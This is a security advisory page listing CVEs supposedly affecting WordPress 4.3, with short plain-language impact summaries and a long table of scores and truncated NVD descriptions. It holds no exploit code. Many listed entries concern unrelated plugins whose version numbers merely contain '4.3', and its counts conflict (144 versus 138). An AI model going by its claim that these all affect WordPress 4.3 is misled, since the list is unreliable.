WordPress 4.3 is an outdated version that currently has 144 known security vulnerabilities, including 9 critical issues that pose serious risks to your website. These vulnerabilities can allow hackers to execute malicious code, steal data, and take complete control of your site. If you're still using WordPress 4.3, it's crucial to understand the dangers and take immediate action to protect your business.
The security landscape has changed dramatically since WordPress 4.3's release. Modern websites face increasingly sophisticated attacks targeting outdated software. With 27 websites still using this vulnerable version, you're not alone—but that doesn't mean you should delay your upgrade. This guide will help you identify if you're at risk and provide clear steps to secure your WordPress installation.
WordPress 4.3 is a major version of WordPress released in 2015. WordPress is a content management system (CMS) that powers nearly 43% of all websites on the internet. It allows users without coding knowledge to create, publish, and manage website content through an intuitive dashboard interface. WordPress 4.3 specifically introduced improvements to media management, customization options, and overall user experience.
However, WordPress 4.3 was released nearly a decade ago, and cybersecurity threats have evolved tremendously since then. WordPress regularly releases security updates to patch newly discovered vulnerabilities. When you don't update your software, you're running with known security holes that hackers actively exploit. Think of it like leaving your front door unlocked while publicizing that you're away—attackers know exactly where to find weaknesses.
144 CVEs found. The most critical are explained below.
The OpenHook plugin has a serious flaw that lets people with basic user accounts run harmful code directly on your server. This is only a risk if you've enabled the [php] shortcode feature in your plugin settings.
Impact: An attacker could take complete control of your website, steal data, modify content, or use your server to attack others.
↗ View on NVDThe Email Subscribers & Newsletters plugin has a weakness that allows attackers to secretly access your database by inserting malicious commands. They can extract sensitive information without leaving obvious signs.
Impact: Hackers could steal your subscriber list, customer information, or other sensitive data stored in your database.
↗ View on NVDThe Infographic Maker plugin doesn't properly check user input before accessing your database. Attackers don't even need to log in to exploit this vulnerability.
Impact: Unauthorized users could extract or manipulate your website's database, potentially exposing all your stored information.
↗ View on NVDThe WordPress Classifieds plugin fails to validate user input properly when processing certain requests. Anyone, logged in or not, can exploit this to access your database.
Impact: Attackers could read, modify, or delete your classified listings and other database records.
↗ View on NVDThe Contact Form Plugin doesn't properly clean data when you export form responses as CSV files. This allows attackers to inject harmful code into your exported files.
Impact: When you open exported CSV files in Excel, the malicious code could run and compromise your computer or steal information.
↗ View on NVDThe Gift Cards plugin has a flaw in one of its features that lets anyone, without logging in, execute database commands. Attackers can exploit this through a specific technical parameter.
Impact: Hackers could steal your gift card data, customer information, or take control of your website's database.
↗ View on NVDShowing first 10 of 138. View all on NVD ↗
| CVE ID | Severity | Score | Published | Description |
|---|---|---|---|---|
| CVE-2025-11693 | CRITICAL | 9.8 | 2025-12-13 | The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed c… |
| CVE-2025-32202 | CRITICAL | 9.1 | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress insert-or-embed-articulate-conte… |
| CVE-2026-4365 | CRITICAL | 9.1 | 2026-04-14 | The LearnPress plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the `delete_question_answer()` function in all versions up to,… |
| CVE-2016-10874 | HIGH | 8.8 | 2019-08-12 | The wp-database-backup plugin before 4.3.3 for WordPress has CSRF. |
| CVE-2016-10876 | HIGH | 8.8 | 2019-08-12 | The wp-database-backup plugin before 4.3.1 for WordPress has CSRF. |
| CVE-2020-10568 | HIGH | 8.8 | 2020-03-14 | The sitepress-multilingual-cms (WPML) plugin before 4.3.7-b.2 for WordPress has CSRF due to a loose comparison. This leads to remote code execution in includes/class-wp-installer.… |
| CVE-2022-3417 | HIGH | 8.8 | 2023-01-09 | The WPtouch WordPress plugin before 4.3.45 unserialises the content of an imported settings file, which could lead to PHP object injections issues when an user import (intentional… |
| CVE-2024-5034 | HIGH | 8.8 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks |
| CVE-2024-5630 | HIGH | 8.8 | 2024-07-15 | The Insert or Embed Articulate Content into WordPress plugin before 4.3000000024 does not prevent authors from uploading arbitrary files to the site, which may allow them to uploa… |
| CVE-2024-9195 | HIGH | 8.8 | 2025-02-28 | The WHMPress - WHMCS Client Area plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on… |
| CVE-2026-5127 | HIGH | 8.8 | 2026-05-08 | The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to Deserialization of Untrusted Data in … |
| CVE-2020-11026 | HIGH | 8.7 | 2020-04-30 | In affected versions of WordPress, files with a specially crafted name when uploaded to the Media section can lead to script execution upon accessing the file. This requires an au… |
| CVE-2024-4611 | HIGH | 8.1 | 2024-05-29 | The AppPresser plugin for WordPress is vulnerable to improper missing encryption exception handling on the 'decrypt_value' and on the 'doCookieAuth' functions in all versions up t… |
| CVE-2023-6696 | HIGH | 8.1 | 2024-06-15 | The Popup Builder – Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capabil… |
| CVE-2025-9991 | HIGH | 8.1 | 2025-09-30 | The Tiny Bootstrap Elements Light plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.3.34 via the 'language' parameter. This makes … |
| CVE-2024-31210 | HIGH | 7.6 | 2024-04-04 | WordPress is an open publishing platform for the Web. It's possible for a file of a type other than a zip file to be submitted as a new plugin by an administrative user on the Plu… |
| CVE-2019-11807 | HIGH | 7.5 | 2019-05-06 | The WooCommerce Checkout Manager plugin before 4.3 for WordPress allows media deletion via the wp-admin/admin-ajax.php?action=update_attachment_wccm wccm_default_keys_load paramet… |
| CVE-2023-6827 | HIGH | 7.5 | 2023-12-15 | The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'ajaxUploadFonts' function in versions up to… |
| CVE-2024-13490 | HIGH | 7.5 | 2025-02-12 | The LTL Freight Quotes – XPO Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, … |
| CVE-2024-13491 | HIGH | 7.5 | 2025-02-19 | The Small Package Quotes – For Customers of FedEx plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, an… |
| CVE-2021-25023 | HIGH | 7.2 | 2022-01-03 | The Speed Booster Pack ⚡ PageSpeed Optimization Suite WordPress plugin before 4.3.3.1 does not escape the sbp_convert_table_name parameter before using it in a SQL statement to co… |
| CVE-2022-3416 | HIGH | 7.2 | 2023-01-09 | The WPtouch WordPress plugin before 4.3.45 does not properly validate images to be uploaded, allowing high privilege users such as admin to upload arbitrary files on the server ev… |
| CVE-2023-2298 | HIGH | 7.2 | 2023-06-03 | The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to… |
| CVE-2023-4719 | HIGH | 7.2 | 2023-09-06 | The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `list_type` parameter in versions up to, and including, 4.3.5 due to insufficien… |
| CVE-2026-1937 | HIGH | 7.2 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capabilit… |
| CVE-2022-4501 | HIGH | 7.1 | 2022-12-14 | The Mega Addons plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the vc_saving_data function in versions up to, and including, 4.3.0… |
| CVE-2024-5151 | HIGH | 7.1 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Script… |
| CVE-2023-7291 | HIGH | 7.1 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_mollie_accoun… |
| CVE-2023-7294 | HIGH | 7.1 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the create_mollie_profile f… |
| CVE-2020-4047 | MEDIUM | 6.8 | 2020-06-12 | In affected versions of WordPress, authenticated users with upload permissions (like authors) are able to inject JavaScript into some media file attachment pages in a certain way.… |
| CVE-2021-4451 | MEDIUM | 6.6 | 2024-10-16 | The NinjaFirewall plugin for WordPress is vulnerable to Authenticated PHAR Deserialization in versions up to, and including, 4.3.3. This allows authenticated attackers to perform … |
| CVE-2021-25072 | MEDIUM | 6.5 | 2022-02-01 | The NextScripts: Social Networks Auto-Poster WordPress plugin before 4.3.25 does not have CSRF check in place when deleting items, allowing attacker to make a logged in admin dele… |
| CVE-2022-0914 | MEDIUM | 6.5 | 2022-04-11 | The Export All URLs WordPress plugin before 4.3 does not have CSRF in place when exporting data, which could allow attackers to make a logged in admin export all posts and pages (… |
| CVE-2023-0335 | MEDIUM | 6.5 | 2023-03-27 | The WP Shamsi WordPress plugin through 4.3.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment. |
| CVE-2023-50824 | MEDIUM | 6.5 | 2023-12-21 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XS… |
| CVE-2025-14980 | MEDIUM | 6.5 | 2026-01-09 | The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible … |
| CVE-2020-11030 | MEDIUM | 6.4 | 2020-04-30 | In affected versions of WordPress, a special payload can be crafted that can lead to scripts getting executed within the search block of the block editor. This requires an authent… |
| CVE-2023-6801 | MEDIUM | 6.4 | 2024-01-06 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settin… |
| CVE-2024-0254 | MEDIUM | 6.4 | 2024-02-05 | The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insuf… |
| CVE-2023-6877 | MEDIUM | 6.4 | 2024-04-07 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's… |
| CVE-2024-5945 | MEDIUM | 6.4 | 2024-06-21 | The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 4.3 due to insufficient input sa… |
| CVE-2025-3782 | MEDIUM | 6.4 | 2025-05-06 | The Cision Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 4.3.0 due to insufficient input san… |
| CVE-2025-4577 | MEDIUM | 6.4 | 2025-06-10 | The Smash Balloon Social Post Feed – Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versio… |
| CVE-2025-5233 | MEDIUM | 6.4 | 2025-06-13 | The Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hex’ parameter in all versions up to, and including, 4.3.2 due to insufficient input s… |
| CVE-2025-14387 | MEDIUM | 6.4 | 2025-12-15 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.3.1 due to insufficient input sanit… |
| CVE-2026-2257 | MEDIUM | 6.4 | 2026-03-13 | The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key … |
| CVE-2026-4333 | MEDIUM | 6.4 | 2026-04-08 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'skin' attribute of the learn_press_courses shortcode in all versio… |
| CVE-2026-3875 | MEDIUM | 6.4 | 2026-04-16 | The BetterDocs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'betterdocs_feedback_form' shortcode in all versions up to, and including, 4.3.8. This is … |
| CVE-2026-7795 | MEDIUM | 6.4 | 2026-06-06 | The Click to Chat – WA Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [chat] shortcode 'num' parameter in all versions up to, and including, 4.38… |
| CVE-2025-7825 | MEDIUM | 6.3 | 2025-10-03 | The Schema Plugin For Divi, Gutenberg & Shortcodes plugin for WordPress is vulnerable to Object Instantiation in all versions up to, and including, 4.3.2 via deserialization of un… |
| CVE-2015-5714 | MEDIUM | 6.1 | 2016-05-22 | Cross-site scripting (XSS) vulnerability in WordPress before 4.3.1 allows remote attackers to inject arbitrary web script or HTML by leveraging the mishandling of unclosed HTML el… |
| CVE-2017-12948 | MEDIUM | 6.1 | 2017-08-18 | Core\Admin\PFTemplater.php in the PressForward plugin 4.3.0 and earlier for WordPress has XSS in the PATH_INFO to wp-admin/admin.php, related to PHP_SELF. |
| CVE-2018-9844 | MEDIUM | 6.1 | 2018-04-07 | The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS. |
| CVE-2016-10873 | MEDIUM | 6.1 | 2019-08-12 | The wp-database-backup plugin before 4.3.3 for WordPress has XSS. |
| CVE-2016-10875 | MEDIUM | 6.1 | 2019-08-12 | The wp-database-backup plugin before 4.3.1 for WordPress has XSS. |
| CVE-2016-10896 | MEDIUM | 6.1 | 2019-08-21 | The seo-redirection plugin before 4.3 for WordPress has stored XSS. |
| CVE-2020-11027 | MEDIUM | 6.1 | 2020-04-30 | In affected versions of WordPress, a password reset link emailed to a user does not expire upon changing the user password. Access would be needed to the email account of the user… |
| CVE-2021-38356 | MEDIUM | 6.1 | 2021-11-01 | The NextScripts: Social Networks Auto-Poster <= 4.3.20 WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the $_REQUEST['page'] parameter which is echoed out on … |
| CVE-2021-24975 | MEDIUM | 6.1 | 2022-02-01 | The NextScripts: Social Networks Auto-Poster WordPress plugin before 4.3.24 does not sanitise and escape logged requests before outputting them in the related admin dashboard, lea… |
| CVE-2023-0448 | MEDIUM | 6.1 | 2023-01-26 | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. |
| CVE-2023-6882 | MEDIUM | 6.1 | 2024-01-11 | The Simple Membership plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘environment_mode’ parameter in all versions up to, and including, 4.3.8 due to … |
| CVE-2022-1617 | MEDIUM | 6.1 | 2024-01-16 | The WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitisation as well as escaping in some of them, allowi… |
| CVE-2024-8872 | MEDIUM | 6.1 | 2024-09-26 | The Store Hours for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all… |
| CVE-2024-13839 | MEDIUM | 6.1 | 2025-03-05 | The Staff Directory Plugin: Company Directory plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on … |
| CVE-2024-5033 | MEDIUM | 5.9 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in adm… |
| CVE-2020-11025 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, a cross-site scripting (XSS) vulnerability in the navigation section of Customizer allows JavaScript code to be executed. Exploitation requires … |
| CVE-2020-11028 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, some private posts, which were previously public, can result in unauthenticated disclosure under a specific set of conditions. This has been pat… |
| CVE-2020-11029 | MEDIUM | 5.8 | 2020-04-30 | In affected versions of WordPress, a vulnerability in the stats() method of class-wp-object-cache.php can be exploited to execute cross-site scripting (XSS) attacks. This has been… |
| CVE-2020-4048 | MEDIUM | 5.7 | 2020-06-12 | In affected versions of WordPress, due to an issue in wp_validate_redirect() and URL sanitization, an arbitrary external link can be crafted leading to unintended/open redirect wh… |
| CVE-2023-24410 | MEDIUM | 5.5 | 2023-10-31 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Contact Form - WPManageNinja LLC Contact Form Plugin – Fastest Contact Form B… |
| CVE-2015-7989 | MEDIUM | 5.4 | 2016-05-22 | Cross-site scripting (XSS) vulnerability in the user list table in WordPress before 4.3.1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted e-… |
| CVE-2018-9172 | MEDIUM | 5.4 | 2018-04-01 | The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes. |
| CVE-2020-4046 | MEDIUM | 5.4 | 2020-06-12 | In affected versions of WordPress, users with low privileges (like contributors and authors) can use the embed block in a certain way to inject unfiltered HTML in the block editor… |
| CVE-2021-24366 | MEDIUM | 5.4 | 2021-06-21 | The Admin Columns WordPress plugin before 4.3 and Admin Columns Pro WordPress plugin before 5.5.1 do not sanitise and escape its Label settings, which could allow high privilege u… |
| CVE-2021-24365 | MEDIUM | 5.4 | 2021-07-12 | The Admin Columns WordPress plugin Free before 4.3.2 and Pro before 5.5.2 allowed to configure individual columns for tables. Each column had a type. The type "Custom Field" allow… |
| CVE-2021-24670 | MEDIUM | 5.4 | 2021-09-27 | The CoolClock WordPress plugin before 4.3.5 does not escape some shortcode attributes, allowing users with a role as low as Contributor toperform Stored Cross-Site Scripting attac… |
| CVE-2022-4478 | MEDIUM | 5.4 | 2023-01-16 | The Font Awesome WordPress plugin before 4.3.2 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with… |
| CVE-2023-0402 | MEDIUM | 5.4 | 2023-01-19 | The Social Warfare plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several AJAX actions in versions up to, and including, 4.3.0. Th… |
| CVE-2023-0403 | MEDIUM | 5.4 | 2023-01-19 | The Social Warfare plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.3.1. This is due to missing or incorrect nonce validation o… |
| CVE-2023-0546 | MEDIUM | 5.4 | 2023-04-10 | The Contact Form Plugin WordPress plugin before 4.3.25 does not properly sanitize and escape the srcdoc attribute in iframes in it's custom HTML field type, allowing a logged in u… |
| CVE-2023-0268 | MEDIUM | 5.4 | 2023-05-08 | The Mega Addons For WPBakery Page Builder WordPress plugin before 4.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post wh… |
| CVE-2023-2414 | MEDIUM | 5.4 | 2023-06-09 | The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vc… |
| CVE-2023-5620 | MEDIUM | 5.4 | 2023-11-27 | The Web Push Notifications WordPress plugin before 4.35.0 does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stor… |
| CVE-2023-6798 | MEDIUM | 5.4 | 2024-01-06 | The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missin… |
| CVE-2024-0757 | MEDIUM | 5.4 | 2024-06-04 | The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowin… |
| CVE-2024-0756 | MEDIUM | 5.4 | 2024-06-04 | The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 lacks validation of URLs when adding iframes, allowing attackers to inject an iFrame in the page … |
| CVE-2023-7287 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized subscription cancellation due to a missing capability check on the pt_cancel_subsc… |
| CVE-2023-7288 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_profile_preferen… |
| CVE-2023-7289 | MEDIUM | 5.4 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized API key update due to a missing capability check on the paytium_sw_save_api_keys f… |
| CVE-2025-4571 | MEDIUM | 5.4 | 2025-06-19 | The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized view and modification of data due to an insufficient capability check on t… |
| CVE-2025-14802 | MEDIUM | 5.4 | 2026-01-07 | The LearnPress – WordPress LMS Plugin for WordPress is vulnerable to unauthorized file deletion in versions up to, and including, 4.3.2.2 via the /wp-json/lp/v1/material/{file_id}… |
| CVE-2026-2879 | MEDIUM | 5.4 | 2026-03-13 | The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` para… |
| CVE-2024-3897 | MEDIUM | 5.3 | 2024-05-02 | The Popup Box – Best WordPress Popup Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_pb_create_author AJAX ac… |
| CVE-2023-4730 | MEDIUM | 5.3 | 2024-08-17 | The LadiApp plugn for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init_endpoint() function hooked via 'init' in versions … |
| CVE-2024-2541 | MEDIUM | 5.3 | 2024-08-29 | The Popup Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.6 via the Subscribers Import feature. This makes i… |
| CVE-2025-13956 | MEDIUM | 5.3 | 2025-12-16 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the statistic function in all versions… |
| CVE-2025-13964 | MEDIUM | 5.3 | 2026-01-06 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the catch_lp_ajax function in al… |
| CVE-2025-14948 | MEDIUM | 5.3 | 2026-01-10 | The miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on t… |
| CVE-2025-14798 | MEDIUM | 5.3 | 2026-01-20 | The LearnPress – WordPress LMS Plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.3.2.4 via the get_item_permissions_check fu… |
| CVE-2026-1938 | MEDIUM | 5.3 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized license key deletion due to a missing authorization check on the `/yaymail-license/v1… |
| CVE-2026-3504 | MEDIUM | 5.3 | 2026-05-02 | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1… |
| CVE-2026-8502 | MEDIUM | 5.3 | 2026-06-06 | The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including,… |
| CVE-2024-32111 | MEDIUM | 5.0 | 2024-06-25 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Automattic WordPress allows Relative Path Traversal.This issue affects WordPress: f… |
| CVE-2020-36831 | MEDIUM | 5.0 | 2024-10-16 | The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on multiple user privilege/security functi… |
| CVE-2025-9085 | MEDIUM | 4.9 | 2025-09-06 | The User Registration & Membership plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in version 4.3.0. This is due to insufficient escaping on the user sup… |
| CVE-2021-24612 | MEDIUM | 4.8 | 2021-10-18 | The Sociable WordPress plugin through 4.3.4.1 does not sanitise or escape some of its settings before outputting them in the admins dashboard, allowing high privilege users to per… |
| CVE-2021-36843 | MEDIUM | 4.8 | 2021-11-26 | Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered in WordPress Floating Social Media Icon plugin (versions <= 4.3.5) Social Media Configuration form. Requir… |
| CVE-2022-2089 | MEDIUM | 4.8 | 2022-07-11 | The Bold Page Builder WordPress plugin before 4.3.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site S… |
| CVE-2022-45816 | MEDIUM | 4.8 | 2022-12-06 | Auth. Stored Cross-Site Scripting (XSS) vulnerability in GD bbPress Attachments plugin <= 4.3.1 on WordPress. |
| CVE-2022-4042 | MEDIUM | 4.8 | 2022-12-26 | The Paytium: Mollie payment forms & donations WordPress plugin before 4.3.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin… |
| CVE-2024-9428 | MEDIUM | 4.8 | 2024-12-12 | The Popup Builder WordPress plugin before 4.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Si… |
| CVE-2024-5026 | MEDIUM | 4.8 | 2025-05-15 | The CM Tooltip Glossary WordPress plugin before 4.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cro… |
| CVE-2024-5032 | MEDIUM | 4.7 | 2024-07-13 | The SULly WordPress plugin before 4.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be … |
| CVE-2026-1943 | MEDIUM | 4.4 | 2026-02-18 | The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 4.3.2 due to insuff… |
| CVE-2026-6813 | MEDIUM | 4.4 | 2026-05-12 | The Continually plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.1 due to insufficient input sanitiza… |
| CVE-2013-1636 | MEDIUM | 4.3 | 2014-03-12 | Cross-site scripting (XSS) vulnerability in open-flash-chart.swf in Open Flash Chart (aka Open-Flash Chart), as used in the Pretty Link Lite plugin before 1.6.3 for WordPress, JNe… |
| CVE-2015-5715 | MEDIUM | 4.3 | 2016-05-22 | The mw_editPost function in wp-includes/class-wp-xmlrpc-server.php in the XMLRPC subsystem in WordPress before 4.3.1 allows remote authenticated users to bypass intended access re… |
| CVE-2022-0313 | MEDIUM | 4.3 | 2022-02-21 | The Float menu WordPress plugin before 4.3.1 does not have CSRF check in place when deleting menu, which could allow attackers to make a logged in admin delete them via a CSRF att… |
| CVE-2022-0444 | MEDIUM | 4.3 | 2022-06-27 | The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin WordPress plugin before 4.3.6 does not have authorisation and CSRF checks when resetting its settings, allo… |
| CVE-2022-4148 | MEDIUM | 4.3 | 2023-03-20 | The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.3.0 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated user… |
| CVE-2023-39999 | MEDIUM | 4.3 | 2023-10-13 | Exposure of Sensitive Information to an Unauthorized Actor in WordPress from 6.3 through 6.3.1, from 6.2 through 6.2.2, from 6.1 through 6.13, from 6.0 through 6.0.5, from 5.9 thr… |
| CVE-2020-36755 | MEDIUM | 4.3 | 2023-10-20 | The Customizr theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.3.0. This is due to missing or incorrect nonce validation on the … |
| CVE-2023-7068 | MEDIUM | 4.3 | 2024-01-03 | The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check… |
| CVE-2023-4626 | MEDIUM | 4.3 | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and i… |
| CVE-2023-4629 | MEDIUM | 4.3 | 2024-03-12 | The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3. This… |
| CVE-2023-7290 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_for_verified_profile… |
| CVE-2023-7292 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized notification dismissal due to a missing capability check on the paytium_notice_dis… |
| CVE-2023-7293 | MEDIUM | 4.3 | 2024-10-16 | The Paytium: Mollie payment forms & donations plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the check_mollie_account_detai… |
| CVE-2024-12532 | MEDIUM | 4.3 | 2025-01-07 | The BWD Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.18 in widgets/bwdeb-content-switcher.php. T… |
| CVE-2026-1003 | MEDIUM | 4.3 | 2026-01-16 | The GetGenie plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.3.0. This is due to the plugin not properly verifying that a user i… |
| CVE-2026-24596 | MEDIUM | 4.3 | 2026-01-23 | Cross-Site Request Forgery (CSRF) vulnerability in marynixie Related Posts Thumbnails Plugin for WordPress related-posts-thumbnails allows Cross Site Request Forgery.This issue af… |
| CVE-2026-3226 | MEDIUM | 4.3 | 2026-03-12 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized email notification triggering due to missing capability checks on all 10 functions in the … |
| CVE-2026-3225 | MEDIUM | 4.3 | 2026-03-23 | The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to unauthorized deletion of quiz question answers due to a missing capability check in the delete_question… |
| CVE-2026-6393 | MEDIUM | 4.3 | 2026-04-24 | The BetterDocs plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 4.3.11. This is due to a missing capability check in the generate_openai… |
| CVE-2026-7648 | MEDIUM | 4.3 | 2026-05-14 | The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to payment bypass through user-controlled key in all versions up to, an… |
| CVE-2020-4050 | LOW | 3.5 | 2020-06-12 | In affected versions of WordPress, misuse of the `set-screen-option` filter's return value allows arbitrary user meta fields to be saved. It does require an admin to install a plu… |
| CVE-2026-1831 | LOW | 2.7 | 2026-02-18 | The YayMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized plugin installation and activation due to missing capability checks on the 'yaymail_i… |
| CVE-2020-4049 | LOW | 2.4 | 2020-06-12 | In affected versions of WordPress, when uploading themes, the name of the theme folder can be crafted in a way that could lead to JavaScript execution in /wp-admin on the themes p… |
